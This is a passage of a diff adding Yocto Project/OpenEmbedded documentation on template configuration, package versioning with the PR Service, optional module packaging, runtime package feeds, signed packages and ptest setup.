+``TEMPLATECONF`` variable to your directory. The ``TEMPLATECONF``
+variable is set in the ``.templateconf`` file, which is in the top-level
+:term:`Source Directory` folder
+(e.g. ``poky``). Edit the ``.templateconf`` so that it can locate your
+directory.
+
+Best practices dictate that you should keep your template configuration
+directory in your custom distribution layer. For example, suppose you
+have a layer named ``meta-mylayer`` located in your home directory and
+you want your template configuration directory named ``myconf``.
+Changing the ``.templateconf`` as follows causes the OpenEmbedded build
+system to look in your directory and base its configuration files on the
+``*.sample`` configuration files it finds. The final configuration files
+(i.e. ``local.conf`` and ``bblayers.conf`` ultimately still end up in
+your Build Directory, but they are based on your ``*.sample`` files.
+::
+
+ TEMPLATECONF=${TEMPLATECONF:-meta-mylayer/myconf}
+
+Aside from the ``*.sample`` configuration files, the ``conf-notes.txt``
+also resides in the default ``meta-poky/conf`` directory. The script
+that sets up the build environment (i.e.
+:ref:`structure-core-script`) uses this file to
+display BitBake targets as part of the script output. Customizing this
+``conf-notes.txt`` file is a good way to make sure your list of custom
+targets appears as part of the script's output.
+
+Here is the default list of targets displayed as a result of running
+either of the setup scripts:
+::
+
+ You can now run 'bitbake <target>'
+
+ Common targets are:
+ core-image-minimal
+ core-image-sato
+ meta-toolchain
+ meta-ide-support
+
+Changing the listed common targets is as easy as editing your version of
+``conf-notes.txt`` in your custom template configuration directory and
+making sure you have ``TEMPLATECONF`` set to your directory.
+
+.. _dev-saving-memory-during-a-build:
+
+Conserving Disk Space During Builds
+===================================
+
+To help conserve disk space during builds, you can add the following
+statement to your project's ``local.conf`` configuration file found in
+the :term:`Build Directory`:
+::
+
+ INHERIT += "rm_work"
+
+Adding this statement deletes the work directory used for
+building a recipe once the recipe is built. For more information on
+"rm_work", see the
+:ref:`rm_work <ref-classes-rm-work>` class in the
+Yocto Project Reference Manual.
+
+Working with Packages
+=====================
+
+This section describes a few tasks that involve packages:
+
+- `Excluding packages from an
+ image <#excluding-packages-from-an-image>`__
+
+- `Incrementing a binary package
+ version <#incrementing-a-binary-package-version>`__
+
+- `Handling optional module
+ packaging <#handling-optional-module-packaging>`__
+
+- `Using runtime package
+ management <#using-runtime-package-management>`__
+
+- `Generating and using signed
+ packages <#generating-and-using-signed-packages>`__
+
+- `Setting up and running package test
+ (ptest) <#testing-packages-with-ptest>`__
+
+- `Creating node package manager (NPM)
+ packages <#creating-node-package-manager-npm-packages>`__
+
+- `Adding custom metadata to
+ packages <#adding-custom-metadata-to-packages>`__
+
+Excluding Packages from an Image
+--------------------------------
+
+You might find it necessary to prevent specific packages from being
+installed into an image. If so, you can use several variables to direct
+the build system to essentially ignore installing recommended packages
+or to not install a package at all.
+
+The following list introduces variables you can use to prevent packages
+from being installed into your image. Each of these variables only works
+with IPK and RPM package types. Support for Debian packages does not
+exist. Also, you can use these variables from your ``local.conf`` file
+or attach them to a specific image recipe by using a recipe name
+override. For more detail on the variables, see the descriptions in the
+Yocto Project Reference Manual's glossary chapter.
+
+- :term:`BAD_RECOMMENDATIONS`:
+ Use this variable to specify "recommended-only" packages that you do
+ not want installed.
+
+- :term:`NO_RECOMMENDATIONS`:
+ Use this variable to prevent all "recommended-only" packages from
+ being installed.
+
+- :term:`PACKAGE_EXCLUDE`:
+ Use this variable to prevent specific packages from being installed
+ regardless of whether they are "recommended-only" or not. You need to
+ realize that the build process could fail with an error when you
+ prevent the installation of a package whose presence is required by
+ an installed package.
+
+.. _incrementing-a-binary-package-version:
+
+Incrementing a Package Version
+------------------------------
+
+This section provides some background on how binary package versioning
+is accomplished and presents some of the services, variables, and
+terminology involved.
+
+In order to understand binary package versioning, you need to consider
+the following:
+
+- Binary Package: The binary package that is eventually built and
+ installed into an image.
+
+- Binary Package Version: The binary package version is composed of two
+ components - a version and a revision.
+
+ .. note::
+
+ Technically, a third component, the "epoch" (i.e. :term:`PE`) is involved
+ but this discussion for the most part ignores ``PE``.
+
+ The version and revision are taken from the
+ :term:`PV` and
+ :term:`PR` variables, respectively.
+
+- ``PV``: The recipe version. ``PV`` represents the version of the
+ software being packaged. Do not confuse ``PV`` with the binary
+ package version.
+
+- ``PR``: The recipe revision.
+
+- :term:`SRCPV`: The OpenEmbedded
+ build system uses this string to help define the value of ``PV`` when
+ the source code revision needs to be included in it.
+
+- :yocto_wiki:`PR Service </wiki/PR_Service>`: A
+ network-based service that helps automate keeping package feeds
+ compatible with existing package manager applications such as RPM,
+ APT, and OPKG.
+
+Whenever the binary package content changes, the binary package version
+must change. Changing the binary package version is accomplished by
+changing or "bumping" the ``PR`` and/or ``PV`` values. Increasing these
+values occurs one of two ways:
+
+- Automatically using a Package Revision Service (PR Service).
+
+- Manually incrementing the ``PR`` and/or ``PV`` variables.
+
+Given a primary challenge of any build system and its users is how to
+maintain a package feed that is compatible with existing package manager
+applications such as RPM, APT, and OPKG, using an automated system is
+much preferred over a manual system. In either system, the main
+requirement is that binary package version numbering increases in a
+linear fashion and that a number of version components exist that
+support that linear progression. For information on how to ensure
+package revisioning remains linear, see the "`Automatically Incrementing
+a Binary Package Revision
+Number <#automatically-incrementing-a-binary-package-revision-number>`__"
+section.
+
+The following three sections provide related information on the PR
+Service, the manual method for "bumping" ``PR`` and/or ``PV``, and on
+how to ensure binary package revisioning remains linear.
+
+Working With a PR Service
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As mentioned, attempting to maintain revision numbers in the
+:term:`Metadata` is error prone, inaccurate,
+and causes problems for people submitting recipes. Conversely, the PR
+Service automatically generates increasing numbers, particularly the
+revision field, which removes the human element.
+
+.. note::
+
+ For additional information on using a PR Service, you can see the
+ :yocto_wiki:`PR Service </wiki/PR_Service>` wiki page.
+
+The Yocto Project uses variables in order of decreasing priority to
+facilitate revision numbering (i.e.
+:term:`PE`,
+:term:`PV`, and
+:term:`PR` for epoch, version, and
+revision, respectively). The values are highly dependent on the policies
+and procedures of a given distribution and package feed.
+
+Because the OpenEmbedded build system uses
+":ref:`signatures <overview-checksums>`", which are
+unique to a given build, the build system knows when to rebuild
+packages. All the inputs into a given task are represented by a
+signature, which can trigger a rebuild when different. Thus, the build
+system itself does not rely on the ``PR``, ``PV``, and ``PE`` numbers to
+trigger a rebuild. The signatures, however, can be used to generate
+these values.
+
+The PR Service works with both ``OEBasic`` and ``OEBasicHash``
+generators. The value of ``PR`` bumps when the checksum changes and the
+different generator mechanisms change signatures under different
+circumstances.
+
+As implemented, the build system includes values from the PR Service
+into the ``PR`` field as an addition using the form "``.x``" so ``r0``
+becomes ``r0.1``, ``r0.2`` and so forth. This scheme allows existing
+``PR`` values to be used for whatever reasons, which include manual
+``PR`` bumps, should it be necessary.
+
+By default, the PR Service is not enabled or running. Thus, the packages
+generated are just "self consistent". The build system adds and removes
+packages and there are no guarantees about upgrade paths but images will
+be consistent and correct with the latest changes.
+
+The simplest form for a PR Service is for it to exist for a single host
+development system that builds the package feed (building system). For
+this scenario, you can enable a local PR Service by setting
+:term:`PRSERV_HOST` in your
+``local.conf`` file in the :term:`Build Directory`:
+::
+
+ PRSERV_HOST = "localhost:0"
+
+Once the service is started, packages will automatically
+get increasing ``PR`` values and BitBake takes care of starting and
+stopping the server.
+
+If you have a more complex setup where multiple host development systems
+work against a common, shared package feed, you have a single PR Service
+running and it is connected to each building system. For this scenario,
+you need to start the PR Service using the ``bitbake-prserv`` command:
+::
+
+ bitbake-prserv --host ip --port port --start
+
+In addition to
+hand-starting the service, you need to update the ``local.conf`` file of
+each building system as described earlier so each system points to the
+server and port.
+
+It is also recommended you use build history, which adds some sanity
+checks to binary package versions, in conjunction with the server that
+is running the PR Service. To enable build history, add the following to
+each building system's ``local.conf`` file:
+::
+
+ # It is recommended to activate "buildhistory" for testing the PR service
+ INHERIT += "buildhistory"
+ BUILDHISTORY_COMMIT = "1"
+
+For information on build
+history, see the "`Maintaining Build Output
+Quality <#maintaining-build-output-quality>`__" section.
+
+.. note::
+
+ The OpenEmbedded build system does not maintain ``PR`` information as
+ part of the shared state (sstate) packages. If you maintain an sstate
+ feed, its expected that either all your building systems that
+ contribute to the sstate feed use a shared PR Service, or you do not
+ run a PR Service on any of your building systems. Having some systems
+ use a PR Service while others do not leads to obvious problems.
+
+ For more information on shared state, see the
+ ":ref:`overview-manual/overview-manual-concepts:shared state cache`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+Manually Bumping PR
+~~~~~~~~~~~~~~~~~~~
+
+The alternative to setting up a PR Service is to manually "bump" the
+:term:`PR` variable.
+
+If a committed change results in changing the package output, then the
+value of the PR variable needs to be increased (or "bumped") as part of
+that commit. For new recipes you should add the ``PR`` variable and set
+its initial value equal to "r0", which is the default. Even though the
+default value is "r0", the practice of adding it to a new recipe makes
+it harder to forget to bump the variable when you make changes to the
+recipe in future.
+
+If you are sharing a common ``.inc`` file with multiple recipes, you can
+also use the ``INC_PR`` variable to ensure that the recipes sharing the
+``.inc`` file are rebuilt when the ``.inc`` file itself is changed. The
+``.inc`` file must set ``INC_PR`` (initially to "r0"), and all recipes
+referring to it should set ``PR`` to "${INC_PR}.0" initially,
+incrementing the last number when the recipe is changed. If the ``.inc``
+file is changed then its ``INC_PR`` should be incremented.
+
+When upgrading the version of a binary package, assuming the ``PV``
+changes, the ``PR`` variable should be reset to "r0" (or "${INC_PR}.0"
+if you are using ``INC_PR``).
+
+Usually, version increases occur only to binary packages. However, if
+for some reason ``PV`` changes but does not increase, you can increase
+the ``PE`` variable (Package Epoch). The ``PE`` variable defaults to
+"0".
+
+Binary package version numbering strives to follow the `Debian Version
+Field Policy
+Guidelines <https://www.debian.org/doc/debian-policy/ch-controlfields.html>`__.
+These guidelines define how versions are compared and what "increasing"
+a version means.
+
+.. _automatically-incrementing-a-binary-package-revision-number:
+
+Automatically Incrementing a Package Version Number
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When fetching a repository, BitBake uses the
+:term:`SRCREV` variable to determine
+the specific source code revision from which to build. You set the
+``SRCREV`` variable to
+:term:`AUTOREV` to cause the
+OpenEmbedded build system to automatically use the latest revision of
+the software:
+::
+
+ SRCREV = "${AUTOREV}"
+
+Furthermore, you need to reference ``SRCPV`` in ``PV`` in order to
+automatically update the version whenever the revision of the source
+code changes. Here is an example:
+::
+
+ PV = "1.0+git${SRCPV}"
+
+The OpenEmbedded build system substitutes ``SRCPV`` with the following:
+
+.. code-block:: none
+
+ AUTOINC+source_code_revision
+
+The build system replaces the ``AUTOINC``
+with a number. The number used depends on the state of the PR Service:
+
+- If PR Service is enabled, the build system increments the number,
+ which is similar to the behavior of
+ :term:`PR`. This behavior results in
+ linearly increasing package versions, which is desirable. Here is an
+ example:
+
+ .. code-block:: none
+
+ hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
+ hello-world-git_0.0+git1+dd2f5c3565-r0.0_armv7a-neon.ipk
+
+- If PR Service is not enabled, the build system replaces the
+ ``AUTOINC`` placeholder with zero (i.e. "0"). This results in
+ changing the package version since the source revision is included.
+ However, package versions are not increased linearly. Here is an
+ example:
+
+ .. code-block:: none
+
+ hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
+ hello-world-git_0.0+git0+dd2f5c3565-r0.0_armv7a-neon.ipk
+
+In summary, the OpenEmbedded build system does not track the history of
+binary package versions for this purpose. ``AUTOINC``, in this case, is
+comparable to ``PR``. If PR server is not enabled, ``AUTOINC`` in the
+package version is simply replaced by "0". If PR server is enabled, the
+build system keeps track of the package versions and bumps the number
+when the package revision changes.
+
+Handling Optional Module Packaging
+----------------------------------
+
+Many pieces of software split functionality into optional modules (or
+plugins) and the plugins that are built might depend on configuration
+options. To avoid having to duplicate the logic that determines what
+modules are available in your recipe or to avoid having to package each
+module by hand, the OpenEmbedded build system provides functionality to
+handle module packaging dynamically.
+
+To handle optional module packaging, you need to do two things:
+
+- Ensure the module packaging is actually done.
+
+- Ensure that any dependencies on optional modules from other recipes
+ are satisfied by your recipe.
+
+Making Sure the Packaging is Done
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To ensure the module packaging actually gets done, you use the
+``do_split_packages`` function within the ``populate_packages`` Python
+function in your recipe. The ``do_split_packages`` function searches for
+a pattern of files or directories under a specified path and creates a
+package for each one it finds by appending to the
+:term:`PACKAGES` variable and
+setting the appropriate values for ``FILES_packagename``,
+``RDEPENDS_packagename``, ``DESCRIPTION_packagename``, and so forth.
+Here is an example from the ``lighttpd`` recipe:
+::
+
+ python populate_packages_prepend () {
+ lighttpd_libdir = d.expand('${libdir}')
+ do_split_packages(d, lighttpd_libdir, '^mod_(.*).so$',
+ 'lighttpd-module-%s', 'Lighttpd module for %s',
+ extra_depends='')
+ }
+
+The previous example specifies a number of things in the call to
+``do_split_packages``.
+
+- A directory within the files installed by your recipe through
+ ``do_install`` in which to search.
+
+- A regular expression used to match module files in that directory. In
+ the example, note the parentheses () that mark the part of the
+ expression from which the module name should be derived.
+
+- A pattern to use for the package names.
+
+- A description for each package.
+
+- An empty string for ``extra_depends``, which disables the default
+ dependency on the main ``lighttpd`` package. Thus, if a file in
+ ``${libdir}`` called ``mod_alias.so`` is found, a package called
+ ``lighttpd-module-alias`` is created for it and the
+ :term:`DESCRIPTION` is set to
+ "Lighttpd module for alias".
+
+Often, packaging modules is as simple as the previous example. However,
+more advanced options exist that you can use within
+``do_split_packages`` to modify its behavior. And, if you need to, you
+can add more logic by specifying a hook function that is called for each
+package. It is also perfectly acceptable to call ``do_split_packages``
+multiple times if you have more than one set of modules to package.
+
+For more examples that show how to use ``do_split_packages``, see the
+``connman.inc`` file in the ``meta/recipes-connectivity/connman/``
+directory of the ``poky`` :ref:`source repository <yocto-project-repositories>`. You can
+also find examples in ``meta/classes/kernel.bbclass``.
+
+Following is a reference that shows ``do_split_packages`` mandatory and
+optional arguments:
+::
+
+ Mandatory arguments
+
+ root
+ The path in which to search
+ file_regex
+ Regular expression to match searched files.
+ Use parentheses () to mark the part of this
+ expression that should be used to derive the
+ module name (to be substituted where %s is
+ used in other function arguments as noted below)
+ output_pattern
+ Pattern to use for the package names. Must
+ include %s.
+ description
+ Description to set for each package. Must
+ include %s.
+
+ Optional arguments
+
+ postinst
+ Postinstall script to use for all packages
+ (as a string)
+ recursive
+ True to perform a recursive search - default
+ False
+ hook
+ A hook function to be called for every match.
+ The function will be called with the following
+ arguments (in the order listed):
+
+ f
+ Full path to the file/directory match
+ pkg
+ The package name
+ file_regex
+ As above
+ output_pattern
+ As above
+ modulename
+ The module name derived using file_regex
+ extra_depends
+ Extra runtime dependencies (RDEPENDS) to be
+ set for all packages. The default value of None
+ causes a dependency on the main package
+ (${PN}) - if you do not want this, pass empty
+ string '' for this parameter.
+ aux_files_pattern
+ Extra item(s) to be added to FILES for each
+ package. Can be a single string item or a list
+ of strings for multiple items. Must include %s.
+ postrm
+ postrm script to use for all packages (as a
+ string)
+ allow_dirs
+ True to allow directories to be matched -
+ default False
+ prepend
+ If True, prepend created packages to PACKAGES
+ instead of the default False which appends them
+ match_path
+ match file_regex on the whole relative path to
+ the root rather than just the file name
+ aux_files_pattern_verbatim
+ Extra item(s) to be added to FILES for each
+ package, using the actual derived module name
+ rather than converting it to something legal
+ for a package name. Can be a single string item
+ or a list of strings for multiple items. Must
+ include %s.
+ allow_links
+ True to allow symlinks to be matched - default
+ False
+ summary
+ Summary to set for each package. Must include %s;
+ defaults to description if not set.
+
+
+
+Satisfying Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~
+
+The second part for handling optional module packaging is to ensure that
+any dependencies on optional modules from other recipes are satisfied by
+your recipe. You can be sure these dependencies are satisfied by using
+the :term:`PACKAGES_DYNAMIC`
+variable. Here is an example that continues with the ``lighttpd`` recipe
+shown earlier:
+::
+
+ PACKAGES_DYNAMIC = "lighttpd-module-.*"
+
+The name
+specified in the regular expression can of course be anything. In this
+example, it is ``lighttpd-module-`` and is specified as the prefix to
+ensure that any :term:`RDEPENDS` and
+:term:`RRECOMMENDS` on a package
+name starting with the prefix are satisfied during build time. If you
+are using ``do_split_packages`` as described in the previous section,
+the value you put in ``PACKAGES_DYNAMIC`` should correspond to the name
+pattern specified in the call to ``do_split_packages``.
+
+Using Runtime Package Management
+--------------------------------
+
+During a build, BitBake always transforms a recipe into one or more
+packages. For example, BitBake takes the ``bash`` recipe and produces a
+number of packages (e.g. ``bash``, ``bash-bashbug``,
+``bash-completion``, ``bash-completion-dbg``, ``bash-completion-dev``,
+``bash-completion-extra``, ``bash-dbg``, and so forth). Not all
+generated packages are included in an image.
+
+In several situations, you might need to update, add, remove, or query
+the packages on a target device at runtime (i.e. without having to
+generate a new image). Examples of such situations include:
+
+- You want to provide in-the-field updates to deployed devices (e.g.
+ security updates).
+
+- You want to have a fast turn-around development cycle for one or more
+ applications that run on your device.
+
+- You want to temporarily install the "debug" packages of various
+ applications on your device so that debugging can be greatly improved
+ by allowing access to symbols and source debugging.
+
+- You want to deploy a more minimal package selection of your device
+ but allow in-the-field updates to add a larger selection for
+ customization.
+
+In all these situations, you have something similar to a more
+traditional Linux distribution in that in-field devices are able to
+receive pre-compiled packages from a server for installation or update.
+Being able to install these packages on a running, in-field device is
+what is termed "runtime package management".
+
+In order to use runtime package management, you need a host or server
+machine that serves up the pre-compiled packages plus the required
+metadata. You also need package manipulation tools on the target. The
+build machine is a likely candidate to act as the server. However, that
+machine does not necessarily have to be the package server. The build
+machine could push its artifacts to another machine that acts as the
+server (e.g. Internet-facing). In fact, doing so is advantageous for a
+production environment as getting the packages away from the development
+system's build directory prevents accidental overwrites.
+
+A simple build that targets just one device produces more than one
+package database. In other words, the packages produced by a build are
+separated out into a couple of different package groupings based on
+criteria such as the target's CPU architecture, the target board, or the
+C library used on the target. For example, a build targeting the
+``qemux86`` device produces the following three package databases:
+``noarch``, ``i586``, and ``qemux86``. If you wanted your ``qemux86``
+device to be aware of all the packages that were available to it, you
+would need to point it to each of these databases individually. In a
+similar way, a traditional Linux distribution usually is configured to
+be aware of a number of software repositories from which it retrieves
+packages.
+
+Using runtime package management is completely optional and not required
+for a successful build or deployment in any way. But if you want to make
+use of runtime package management, you need to do a couple things above
+and beyond the basics. The remainder of this section describes what you
+need to do.
+
+.. _runtime-package-management-build:
+
+Build Considerations
+~~~~~~~~~~~~~~~~~~~~
+
+This section describes build considerations of which you need to be
+aware in order to provide support for runtime package management.
+
+When BitBake generates packages, it needs to know what format or formats
+to use. In your configuration, you use the
+:term:`PACKAGE_CLASSES`
+variable to specify the format:
+
+1. Open the ``local.conf`` file inside your
+ :term:`Build Directory` (e.g.
+ ``~/poky/build/conf/local.conf``).
+
+2. Select the desired package format as follows:
+ ::
+
+ PACKAGE_CLASSES ?= "package_packageformat"
+
+ where packageformat can be "ipk", "rpm",
+ "deb", or "tar" which are the supported package formats.
+
+ .. note::
+
+ Because the Yocto Project supports four different package formats,
+ you can set the variable with more than one argument. However, the
+ OpenEmbedded build system only uses the first argument when
+ creating an image or Software Development Kit (SDK).
+
+If you would like your image to start off with a basic package database
+containing the packages in your current build as well as to have the
+relevant tools available on the target for runtime package management,
+you can include "package-management" in the
+:term:`IMAGE_FEATURES`
+variable. Including "package-management" in this configuration variable
+ensures that when the image is assembled for your target, the image
+includes the currently-known package databases as well as the
+target-specific tools required for runtime package management to be
+performed on the target. However, this is not strictly necessary. You
+could start your image off without any databases but only include the
+required on-target package tool(s). As an example, you could include
+"opkg" in your
+:term:`IMAGE_INSTALL` variable
+if you are using the IPK package format. You can then initialize your
+target's package database(s) later once your image is up and running.
+
+Whenever you perform any sort of build step that can potentially
+generate a package or modify existing package, it is always a good idea
+to re-generate the package index after the build by using the following
+command:
+::
+
+ $ bitbake package-index
+
+It might be tempting to build the
+package and the package index at the same time with a command such as
+the following:
+::
+
+ $ bitbake some-package package-index
+
+Do not do this as
+BitBake does not schedule the package index for after the completion of
+the package you are building. Consequently, you cannot be sure of the
+package index including information for the package you just built.
+Thus, be sure to run the package update step separately after building
+any packages.
+
+You can use the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables to pre-configure target images to use a package feed. If you
+do not define these variables, then manual steps as described in the
+subsequent sections are necessary to configure the target. You should
+set these variables before building the image in order to produce a
+correctly configured image.
+
+When your build is complete, your packages reside in the
+``${TMPDIR}/deploy/packageformat`` directory. For example, if
+``${``\ :term:`TMPDIR`\ ``}`` is
+``tmp`` and your selected package type is RPM, then your RPM packages
+are available in ``tmp/deploy/rpm``.
+
+.. _runtime-package-management-server:
+
+Host or Server Machine Setup
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Although other protocols are possible, a server using HTTP typically
+serves packages. If you want to use HTTP, then set up and configure a
+web server such as Apache 2, lighttpd, or Python web server on the
+machine serving the packages.
+
+To keep things simple, this section describes how to set up a
+Python web server to share package feeds from the developer's
+machine. Although this server might not be the best for a production
+environment, the setup is simple and straight forward. Should you want
+to use a different server more suited for production (e.g. Apache 2,
+Lighttpd, or Nginx), take the appropriate steps to do so.
+
+From within the build directory where you have built an image based on
+your packaging choice (i.e. the
+:term:`PACKAGE_CLASSES`
+setting), simply start the server. The following example assumes a build
+directory of ``~/poky/build/tmp/deploy/rpm`` and a ``PACKAGE_CLASSES``
+setting of "package_rpm":
+::
+
+ $ cd ~/poky/build/tmp/deploy/rpm
+ $ python3 -m http.server
+
+.. _runtime-package-management-target:
+
+Target Setup
+~~~~~~~~~~~~
+
+Setting up the target differs depending on the package management
+system. This section provides information for RPM, IPK, and DEB.
+
+.. _runtime-package-management-target-rpm:
+
+Using RPM
+^^^^^^^^^
+
+The `Dandified Packaging
+Tool <https://en.wikipedia.org/wiki/DNF_(software)>`__ (DNF) performs
+runtime package management of RPM packages. In order to use DNF for
+runtime package management, you must perform an initial setup on the
+target machine for cases where the ``PACKAGE_FEED_*`` variables were not
+set as part of the image that is running on the target. This means if
+you built your image and did not not use these variables as part of the
+build and your image is now running on the target, you need to perform
+the steps in this section if you want to use runtime package management.
+
+.. note::
+
+ For information on the ``PACKAGE_FEED_*`` variables, see
+ :term:`PACKAGE_FEED_ARCHS`, :term:`PACKAGE_FEED_BASE_PATHS`, and
+ :term:`PACKAGE_FEED_URIS` in the Yocto Project Reference Manual variables
+ glossary.
+
+On the target, you must inform DNF that package databases are available.
+You do this by creating a file named
+``/etc/yum.repos.d/oe-packages.repo`` and defining the ``oe-packages``.
+
+As an example, assume the target is able to use the following package
+databases: ``all``, ``i586``, and ``qemux86`` from a server named
+``my.server``. The specifics for setting up the web server are up to
+you. The critical requirement is that the URIs in the target repository
+configuration point to the correct remote location for the feeds.
+
+.. note::
+
+ For development purposes, you can point the web server to the build
+ system's ``deploy`` directory. However, for production use, it is better to
+ copy the package directories to a location outside of the build area and use
+ that location. Doing so avoids situations where the build system
+ overwrites or changes the ``deploy`` directory.
+
+When telling DNF where to look for the package databases, you must
+declare individual locations per architecture or a single location used
+for all architectures. You cannot do both:
+
+- *Create an Explicit List of Architectures:* Define individual base
+ URLs to identify where each package database is located:
+
+ .. code-block:: none
+
+ [oe-packages]
+ baseurl=http://my.server/rpm/i586 http://my.server/rpm/qemux86 http://my.server/rpm/all
+
+ This example
+ informs DNF about individual package databases for all three
+ architectures.
+
+- *Create a Single (Full) Package Index:* Define a single base URL that
+ identifies where a full package database is located:
+ ::
+
+ [oe-packages]
+ baseurl=http://my.server/rpm
+
+ This example informs DNF about a single
+ package database that contains all the package index information for
+ all supported architectures.
+
+Once you have informed DNF where to find the package databases, you need
+to fetch them:
+
+.. code-block:: none
+
+ # dnf makecache
+
+DNF is now able to find, install, and
+upgrade packages from the specified repository or repositories.
+
+.. note::
+
+ See the `DNF documentation <https://dnf.readthedocs.io/en/latest/>`__ for
+ additional information.
+
+.. _runtime-package-management-target-ipk:
+
+Using IPK
+^^^^^^^^^
+
+The ``opkg`` application performs runtime package management of IPK
+packages. You must perform an initial setup for ``opkg`` on the target
+machine if the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables have not been set or the target image was built before the
+variables were set.
+
+The ``opkg`` application uses configuration files to find available
+package databases. Thus, you need to create a configuration file inside
+the ``/etc/opkg/`` direction, which informs ``opkg`` of any repository
+you want to use.
+
+As an example, suppose you are serving packages from a ``ipk/``
+directory containing the ``i586``, ``all``, and ``qemux86`` databases
+through an HTTP server named ``my.server``. On the target, create a
+configuration file (e.g. ``my_repo.conf``) inside the ``/etc/opkg/``
+directory containing the following:
+
+.. code-block:: none
+
+ src/gz all http://my.server/ipk/all
+ src/gz i586 http://my.server/ipk/i586
+ src/gz qemux86 http://my.server/ipk/qemux86
+
+Next, instruct ``opkg`` to fetch the
+repository information:
+
+.. code-block:: none
+
+ # opkg update
+
+The ``opkg`` application is now able to find, install, and upgrade packages
+from the specified repository.
+
+.. _runtime-package-management-target-deb:
+
+Using DEB
+^^^^^^^^^
+
+The ``apt`` application performs runtime package management of DEB
+packages. This application uses a source list file to find available
+package databases. You must perform an initial setup for ``apt`` on the
+target machine if the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables have not been set or the target image was built before the
+variables were set.
+
+To inform ``apt`` of the repository you want to use, you might create a
+list file (e.g. ``my_repo.list``) inside the
+``/etc/apt/sources.list.d/`` directory. As an example, suppose you are
+serving packages from a ``deb/`` directory containing the ``i586``,
+``all``, and ``qemux86`` databases through an HTTP server named
+``my.server``. The list file should contain:
+
+.. code-block:: none
+
+ deb http://my.server/deb/all ./
+ deb http://my.server/deb/i586 ./
+ deb http://my.server/deb/qemux86 ./
+
+Next, instruct the ``apt`` application
+to fetch the repository information:
+
+.. code-block:: none
+
+ # apt-get update
+
+After this step,
+``apt`` is able to find, install, and upgrade packages from the
+specified repository.
+
+Generating and Using Signed Packages
+------------------------------------
+
+In order to add security to RPM packages used during a build, you can
+take steps to securely sign them. Once a signature is verified, the
+OpenEmbedded build system can use the package in the build. If security
+fails for a signed package, the build system aborts the build.
+
+This section describes how to sign RPM packages during a build and how
+to use signed package feeds (repositories) when doing a build.
+
+Signing RPM Packages
+~~~~~~~~~~~~~~~~~~~~
+
+To enable signing RPM packages, you must set up the following
+configurations in either your ``local.config`` or ``distro.config``
+file:
+::
+
+ # Inherit sign_rpm.bbclass to enable signing functionality
+ INHERIT += " sign_rpm"
+ # Define the GPG key that will be used for signing.
+ RPM_GPG_NAME = "key_name"
+ # Provide passphrase for the key
+ RPM_GPG_PASSPHRASE = "passphrase"
+
+.. note::
+
+ Be sure to supply appropriate values for both `key_name` and
+ `passphrase`.
+
+Aside from the ``RPM_GPG_NAME`` and ``RPM_GPG_PASSPHRASE`` variables in
+the previous example, two optional variables related to signing exist:
+
+- *GPG_BIN:* Specifies a ``gpg`` binary/wrapper that is executed
+ when the package is signed.
+
+- *GPG_PATH:* Specifies the ``gpg`` home directory used when the
+ package is signed.
+
+Processing Package Feeds
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+In addition to being able to sign RPM packages, you can also enable
+signed package feeds for IPK and RPM packages.
+
+The steps you need to take to enable signed package feed use are similar
+to the steps used to sign RPM packages. You must define the following in
+your ``local.config`` or ``distro.config`` file:
+::
+
+ INHERIT += "sign_package_feed"
+ PACKAGE_FEED_GPG_NAME = "key_name"
+ PACKAGE_FEED_GPG_PASSPHRASE_FILE = "path_to_file_containing_passphrase"
+
+For signed package feeds, the passphrase must exist in a separate file,
+which is pointed to by the ``PACKAGE_FEED_GPG_PASSPHRASE_FILE``
+variable. Regarding security, keeping a plain text passphrase out of the
+configuration is more secure.
+
+Aside from the ``PACKAGE_FEED_GPG_NAME`` and
+``PACKAGE_FEED_GPG_PASSPHRASE_FILE`` variables, three optional variables
+related to signed package feeds exist:
+
+- *GPG_BIN* Specifies a ``gpg`` binary/wrapper that is executed
+ when the package is signed.
+
+- *GPG_PATH:* Specifies the ``gpg`` home directory used when the
+ package is signed.
+
+- *PACKAGE_FEED_GPG_SIGNATURE_TYPE:* Specifies the type of ``gpg``
+ signature. This variable applies only to RPM and IPK package feeds.
+ Allowable values for the ``PACKAGE_FEED_GPG_SIGNATURE_TYPE`` are
+ "ASC", which is the default and specifies ascii armored, and "BIN",
+ which specifies binary.
+
+Testing Packages With ptest
+---------------------------
+
+A Package Test (ptest) runs tests against packages built by the
+OpenEmbedded build system on the target machine. A ptest contains at
+least two items: the actual test, and a shell script (``run-ptest``)
+that starts the test. The shell script that starts the test must not
+contain the actual test - the script only starts the test. On the other
+hand, the test can be anything from a simple shell script that runs a
+binary and checks the output to an elaborate system of test binaries and
+data files.
+
+The test generates output in the format used by Automake:
+::
+
+ result: testname
+
+where the result can be ``PASS``, ``FAIL``, or ``SKIP``, and
+the testname can be any identifying string.
+
+For a list of Yocto Project recipes that are already enabled with ptest,
+see the :yocto_wiki:`Ptest </wiki/Ptest>` wiki page.
+
+.. note::
+
+ A recipe is "ptest-enabled" if it inherits the
+ :ref:`ptest <ref-classes-ptest>` class.
+
+Adding ptest to Your Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To add package testing to your build, add the
+:term:`DISTRO_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`
+variables to your ``local.conf`` file, which is found in the
+:term:`Build Directory`:
+::
+
+ DISTRO_FEATURES_append = " ptest"
+ EXTRA_IMAGE_FEATURES += "ptest-pkgs"
+
+Once your build is complete, the ptest files are installed into the
+``/usr/lib/package/ptest`` directory within the image, where ``package``
+is the name of the package.
+
+Running ptest
+~~~~~~~~~~~~~
+
+The ``ptest-runner`` package installs a shell script that loops through
